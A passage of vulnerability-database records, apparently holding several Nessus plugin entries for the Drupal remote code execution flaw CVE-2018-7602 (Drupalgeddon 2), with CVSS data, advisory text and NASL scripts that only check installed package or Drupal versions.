exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal7-7.59-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:35", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-004", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "nessus", "title": "Debian DSA-4180-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-26T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4180.NASL", "href": "https://www.tenable.com/plugins/nessus/109349", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4180. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109349);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"DSA\", value:\"4180\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Debian DSA-4180-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=896701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4180\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7602\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u12\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:29", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal7 (2018-2359c2ae0e) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-2359C2AE0E.NASL", "href": "https://www.tenable.com/plugins/nessus/109706", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-2359c2ae0e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109706);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 26 : drupal7 (2018-2359c2ae0e) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-2359c2ae0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal7-7.59-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:40", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 27 : drupal7 (2018-b9ad458866) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-B9AD458866.NASL", "href": "https://www.tenable.com/plugins/nessus/109710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b9ad458866.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109710);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 27 : drupal7 (2018-b9ad458866) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b9ad458866\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"drupal7-7.59-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:16", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.59, 8.4.x prior to 8.4.8, or 8.5.x prior to 8.5.3. It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.59 / 8.4.x < 8.4.8 / 8.5.x < 8.5.3 Remote Code Execution Vulnerability (SA-CORE-2018-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_3.NASL", "href": "https://www.tenable.com/plugins/nessus/109344", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109344);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Drupal 7.x < 7.59 / 8.4.x < 8.4.8 / 8.5.x < 8.5.3 Remote Code Execution Vulnerability (SA-CORE-2018-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.59, 8.4.x prior to 8.4.8,\nor 8.5.x prior to 8.5.3. It is, therefore, affected by a remote code\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.59\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.59 / 8.4.8 / 8.5.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7602\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:\"Drupal\", port:port, webapp:true);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"7.0\", \"max_version\" : \"7.58\", \"fixed_version\" : \"7.59\" },\n { \"min_version\" : \"8.4.0\", \"max_version\" : \"8.4.7\", \"fixed_version\" : \"8.4.8\" },\n { \"min_version\" : \"8.5.0\", \"max_version\" : \"8.5.2\", \"fixed_version\" : \"8.5.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:33", "description": "A remote code execution vulnerability has been found within multiple subsystems of Drupal. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-27T00:00:00", "type": "nessus", "title": "Debian DLA-1365-1 : drupal7 security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1365.NASL", "href": "https://www.tenable.com/plugins/nessus/109381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1365-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109381);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Debian DLA-1365-1 : drupal7 security update (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\n\nFor Debian 7 'Wheezy', these problems have been 